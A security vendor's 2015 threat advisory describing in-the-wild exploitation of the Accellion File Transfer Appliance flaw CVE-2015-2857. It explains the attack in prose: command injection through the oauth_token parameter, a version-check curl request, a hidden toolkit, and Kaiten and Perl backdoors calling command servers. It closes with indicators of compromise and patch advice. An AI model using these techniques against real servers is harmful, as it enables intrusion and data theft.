Threat Advisory: Accellion File Transfer Appliance Vulnerability



Similar documents
Niara Security Analytics. Overview. Automatically detect attacks on the inside using machine learning

Niara Security Intelligence. Overview. Threat Discovery and Incident Investigation Reimagined

THREAT VISIBILITY & VULNERABILITY ASSESSMENT

Architecture. The DMZ is a portion of a network that separates a purely internal network from an external network.

Automating Linux Malware Analysis Using Limon Sandbox Monnappa K A monnappa22@gmail.com

DYNAMIC DNS: DATA EXFILTRATION

Cyber Security. BDS PhantomWorks. Boeing Energy. Copyright 2011 Boeing. All rights reserved.

defending against advanced persistent threats: strategies for a new era of attacks agility made possible

Make a folder named Lab3. We will be using Unix redirection commands to create several output files in that folder.

IBM Security IBM Corporation IBM Corporation

North American Electric Reliability Corporation (NERC) Cyber Security Standard

Practical Threat Intelligence. with Bromium LAVA

Shellshock. Oz Elisyan & Maxim Zavodchik

Concierge SIEM Reporting Overview

Incident Response. Six Best Practices for Managing Cyber Breaches.

A New Perspective on Protecting Critical Networks from Attack:

CHAPTER 3 : INCIDENT RESPONSE FIVE KEY RECOMMENDATIONS GLOBAL THREAT INTELLIGENCE REPORT 2015 :: COPYRIGHT 2015 NTT INNOVATION INSTITUTE 1 LLC

DATA SHEET. What Darktrace Finds

IBM SECURITY QRADAR INCIDENT FORENSICS

Securing SharePoint 101. Rob Rachwald Imperva

Security Threat Kill Chain What log data would you need to identify an APT and perform forensic analysis?

How To Mitigate A Ddos Attack

IBM QRadar Security Intelligence April 2013

Advanced Visibility. Moving Beyond a Log Centric View. Matthew Gardiner, RSA & Richard Nichols, RSA

Configuring Virtual Switches for Use with PVS. February 7, 2014 (Revision 1)

Addressing APTs and Modern Malware with Security Intelligence Date: September 2013 Author: Jon Oltsik, Senior Principal Analyst

Getting Started with the iscan Online Data Breach Risk Intelligence Platform

Take the Red Pill: Becoming One with Your Computing Environment using Security Intelligence

ANNEXURE-1 TO THE TENDER ENQUIRY NO.: DPS/AMPU/MIC/1896. Network Security Software Nessus- Technical Details

RSA Security Anatomy of an Attack Lessons learned

Security strategies to stay off the Børsen front page

Network and Host-based Vulnerability Assessment

Defending Against Cyber Attacks with SessionLevel Network Security

RSA Security Analytics

First Line of Defense

Penetration Testing Report Client: Business Solutions June 15 th 2015

NYS LOCAL GOVERNMENT VULNERABILITY SCANNING PROJECT September 22, 2011

Who Drives Cybersecurity in Your Business? Milan Patel, K2 Intelligence. AIBA Quarterly Meeting September 10, 2015

WHITE PAPER Cloud-Based, Automated Breach Detection. The Seculert Platform

1 hours, 30 minutes, 38 seconds Heavy scan. All scanned network resources. Copyright 2001, FTP access obtained

Symantec Cyber Threat Analysis Program Program Overview. Symantec Cyber Threat Analysis Program Team

Specific recommendations

QRadar SIEM 6.3 Datasheet

NETWORK PENETRATION TESTING

Overview of Network Security The need for network security Desirable security properties Common vulnerabilities Security policy designs

Speed Up Incident Response with Actionable Forensic Analytics

An Introduction to Network Vulnerability Testing

GETTING REAL ABOUT SECURITY MANAGEMENT AND "BIG DATA"

Ovation Security Center Data Sheet

IBM Advanced Threat Protection Solution

April 11, (Revision 2)

WHITE PAPER. An Introduction to Network- Vulnerability Testing

Network Incident Report

Breaking the Cyber Attack Lifecycle

WHITEPAPER. How a DNS Firewall Helps in the Battle against Advanced Persistent Threat and Similar Malware

Cisco Cyber Threat Defense - Visibility and Network Prevention

INSIDE. Malicious Threats of Peer-to-Peer Networking

Breach Found. Did It Hurt?

Using LYNXeon with NetFlow to Complete Your Cyber Security Picture

Advanced Persistent Threats

PCI DSS Reporting WHITEPAPER

Protecting Your Organisation from Targeted Cyber Intrusion

Win the race against time to stay ahead of cybercriminals

SPEAR PHISHING AN ENTRY POINT FOR APTS

Under the Hood of the IBM Threat Protection System

Technical Note. CounterACT: Powerful, Automated Network Protection Inside and Out

[state of the internet] / SEO Attacks. Threat Advisory: Continuous Uptick in SEO Attacks

Staying Secure After Microsoft Windows Server 2003 Reaches End of Life. Trevor Richmond, Sales Engineer Trend Micro

Networks and Security Lab. Network Forensics

Detect & Investigate Threats. OVERVIEW

Norton Personal Firewall for Macintosh

CS 356 Lecture 25 and 26 Operating System Security. Spring 2013

Cloud Security Primer MALICIOUS NETWORK COMMUNICATIONS: WHAT ARE YOU OVERLOOKING?

DETECT AND RESPOND TO THREATS FROM THE DATA CENTER TO THE CLOUD

The FBI Cyber Program. Bauer Advising Symposium //UNCLASSIFIED

IBM Security QRadar Vulnerability Manager Version User Guide

Malware Analysis Quiz 6

Penetration Test Report

Symantec Advanced Threat Protection: Network

WildFire. Preparing for Modern Network Attacks

Preparing for a Cyber Attack PROTECT YOUR PEOPLE AND INFORMATION WITH SYMANTEC SECURITY SOLUTIONS

FIREWALLS & NETWORK SECURITY with Intrusion Detection and VPNs, 2 nd ed. Chapter 4 Finding Network Vulnerabilities

OPC & Security Agenda

How We're Getting Creamed

Cautela Labs Cloud Agile. Secured. Threat Management Security Solutions at Work

Evading Infrastructure Security Mohamed Bedewi Penetration Testing Consultant

Reporting and Incident Management for Firewalls

Lessons from the DHS Cyber Test Bed Project

INTRODUCING isheriff CLOUD SECURITY

24/7 Visibility into Advanced Malware on Networks and Endpoints

SECURITY ANALYTICS MOVES TO REAL-TIME PROTECTION

ProtectWise: Shifting Network Security to the Cloud Date: March 2015 Author: Tony Palmer, Senior Lab Analyst and Aviv Kaufmann, Lab Analyst

Transcription:

Threat Advisory: Accellion File Transfer Appliance Vulnerability Niara Threat Advisories provide timely information regarding new attacks along with how Niara helps companies quickly detect an attack to limit its impact and prevent it from establishing a persistent presence within the organization. Niara s security analytics platform provides a rich set of capabilities to automatically find attacks on the inside that evaded real-time defense systems and focus security teams efforts on the threats that matter. For more details on Niara s capabilities or to schedule a demo to see Niara in action, contact us at info@niara.com or at www.niara.com/contact What did Niara discover? Niara has discovered (as far as we know) the first sighting of CVE-2015-2857 in the wild. CVE-2015-2857 is the Accellion File Transfer Appliance (FTA) vulnerability, discovered by Rapid 7 in mid- 2015. Late last month, Niara s security researchers identified a compromised Accellion FTA within an organization. The Accellion FTA was being used as a beachhead to launch further attacks on other Accellion FTAs and create a cluster of compromised servers. While the motivation for this is not known, any compromise of a server storing important files should be taken very seriously. What is the Accellion Secure File Transfer Appliance vulnerability? The Accellion FTA provides secure file sharing and transfer for both internal and external recipients. In mid-2015, Rapid 7 discovered a remote command execution (RCE) vulnerability on the Accellion FTA, which could give cyber criminals near-complete access to the appliance, potentially resulting in the exfiltration of secure files. This is made possible due to insufficient sanitation of the oauth_ token parameter and how file permissions are configured by default. This vulnerability is present in appliance software version FTA_9_11_200 and likely all prior versions. Accellion quickly released updated software (FTA_9_11_210) to address this vulnerability. However due to different patch cycles within organizations, the vulnerability remains. The common vulnerabilities and exposure (CVE) identifier of this vulnerability is CVE-2015-2857. Copyright 2015 Niara, Inc. All rights reserved. 1

The Attack Flow 1. Install IRC backdoor on compromised Accellion FTA 2. Connect to a command and control (C&C) server 3. Download exploit tools and instructions from another C&C server 4. Download LoRD of IRAN HACKERS backdoor 5. Perform the exploit to compromise other vulnerable Accellion FTAs Figure 1: Visualization of the attack Copyright 2015 Niara, Inc. All rights reserved. 2

Technical Analysis The attackers downloaded Kaiten, a well-known IRC backdoor, on the compromised Accellion FTA. The backdoor served as the primary channel for cyber criminals to issue commands to the compromised server via the IRC protocol. The attackers then issued commands to download a compressed archive file (tws.tar.gz) that contained all the tools and blueprint for exploiting the CVE-2015-2857 (e.g., ports scanner, binaries to conduct the exploits, instructions, etc.). Once tws.tar.gz was downloaded, it was decompressed and unzipped. The figures in this document show the rich investigative information that security analysts can easily retrieve from the Niara platform. This information provided invaluable assistance for Niara s own security researches to identify the exploit. Figure 2: Commands being issued via the IRC channel used by the attackers to download tws.tar.gz. Figure 3: Download of tws.tar.gz from a C&C server In Singapore. Copyright 2015 Niara, Inc. All rights reserved. 3

Contents of Downloaded Instructions The C&C server provided instructions and tools to exploit the vulnerability via a compressed archive file. The file, named tws.tar.gz, has the following directory structure. By using file names starting with., the attackers ensured that the file and components would not be visible via a simple list directory (ls) command..tws/.tws/.mshit.tws/.ss.tws/.start.tws/.exp.tws/.done/.tws/.test.tws/.range Below is a description of the various components in the download..mshit is a script that email the list of vulnerable Accellion FTA systems, identified during port scanning, to an email address with the email domain pegcity.info. The subject line of the email was Accellion Secure File Transfer Servers.ss is an ELF executable file which is a well known port scanner with an md5sum of b51a52c9c82bb4401659b4c17c60f89f.start is a shell script for starting and stopping the reconnaissance (i.e., the.ss file) and exploit (i.e., the.exp file) scripts.exp is a shell script used for exploiting the vulnerability CVE-2015-2857.test is a shell script used to scan for vulnerable Accellion servers.range contains the range of IP addresses that needed to be scanned The Exploit Once the compressed archive file was downloaded on the compromised Accellion FTA the attackers issued commands to conduct port scans of class A networks to identify other vulnerable Accellion servers on the internet. Once additional vulnerable servers were identified, backdoor binaries were downloaded on to them. The steps followed by the attackers are explained below. Copyright 2015 Niara, Inc. All rights reserved. 4

1. The port scanner (. ss) was used to scan the range of the IP addresses specified in the.range file. 2. The results of the port scan, which were the IP addresses of vulnerable Accellion FTAs, were stored in a file called bios.txt. 3. bios.txt was then passed to the.test script, which performed a curl request to each IP address listed in the file. a. The curl request is made to the URI /tws/getstatus which returns the version of the Accellion server. b. Vulnerable servers are identified by grepping for 0.18 in the response to the curl request. 4. After identifying additional vulnerable servers, the attackers went on to exploit them by executing the.exp script. Figure 4: Content of the test script that identifies vulnerable Accellion servers. Figure 5: Contents of the.exp shell script. The exploit script (.exp) shows how the attackers supplied UNIX commands in the oauth_token to drop an ELF executable on the newly identified vulnerable Accellion system. This executable named perl is dropped under the /tmp/ directory of the newly identified systems and executed. Niara s research showed that this executable is the Kaiten IRC binary. The md5 of the executable is f7fb6c2471099f65b66eca4b14c78116. Copyright 2015 Niara, Inc. All rights reserved. 5

LorD of IRAN HACKERS In addition to the Kaiten backdoor, the attackers downloaded another Perl script called bd from the same server from which tws.tar.gz was downloaded. Niara believes that the attackers did this to have another channel of communication with the compromised Accellion FTA, in case one of the channels went down. Figure 6: Attackers issuing the command to download another backdoor, called bd. Figure 7: Actual download of the backdoor (bd). Copyright 2015 Niara, Inc. All rights reserved. 6

Figure 8: The connections established as a result of executing the backdoor (bd). Figure 8 shows the successful connections that bd, another backdoor, establishes with the C&C server. A quick Google search for LorD of IRAN HACKERS SABOTAGE (shown at the top of the figure) returns many results, indicating that it is a popular backdoor. This backdoor is a Perl script that takes two arguments, IP address and port, which the attackers provided via the Kaiten IRC channel. In this attack, the C&C IP address that was provided was in Russia and port used was 45696. How did Niara help? Niara maintains high-fidelity forensics that are retained for a far longer period than what s possible with traditional monitoring systems, due in part to Niara s use of big data technologies. Forensics go all the way down to raw data level, including PCAPs, which enables Niara to provide complete visibility into what happened in the past. Because Niara maintains a complete forensic trail, all the way down to the packet level, Niara s security researchers were able to start with the initial evidence (i.e., communication with an unusual IP address) and perform advanced threat hunting to see exactly what happened in the past. Without the packet retention capabilities being intertwined with Niara s analytics, this would not have been possible. Copyright 2015 Niara, Inc. All rights reserved. 7

What Should You Do? Organizations with vulnerable versions of the Accellion server can use the below IoCs to check if they are compromised. As always please upgrade your Accellion servers to the latest version. The fix was made available in version FTA_9_11_210, so update your Accellion FTA software to this or a more recent release. Network IoC IRC Connections to IP s located in the Russia Noisy port scans on port 443 out to the internet on different class A or class B subnets wget to download archive files from IP addresses not resolved through DNS Endpoint IoC Look for any hidden directories called.tws under /usr/include. There is a chance that these names are different so look at any newly created hidden directories. Presence of a hidden binary called.perl under the /tmp directory. Please note that the attackers do change names often, so look at any suspicious hidden ELF executable. About Niara Niara s security analytics platform automates the detection of attacks that have bypassed an organization s perimeter defenses and dramatically reduces the time and skill needed to investigate and respond to security events. The solution applies machine learning algorithms and forensics to data from the network and security infrastructure to detect compromised users, entities, and malicious insiders, speed threat hunting efforts, and reduce the time for incident investigation and response by focusing security teams on the threats that matter. Headquartered in Sunnyvale, Calif., the company is backed by NEA, Index Ventures, and Venrock. For more information, visit www.niara.com. Copyright 2015 Niara, Inc. All rights reserved. NIARA, NIARA INC., the NIARA logo and PETASECURE are trademarks of Niara Incorporated. All third-party trademarks, trade names, or service marks may be claimed as the property of their respective owners. Niara s technology and products are protected by issued and pending U.S. and foreign patents. 20151111 Copyright 2015 Niara, Inc. All rights reserved. 8

2026 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information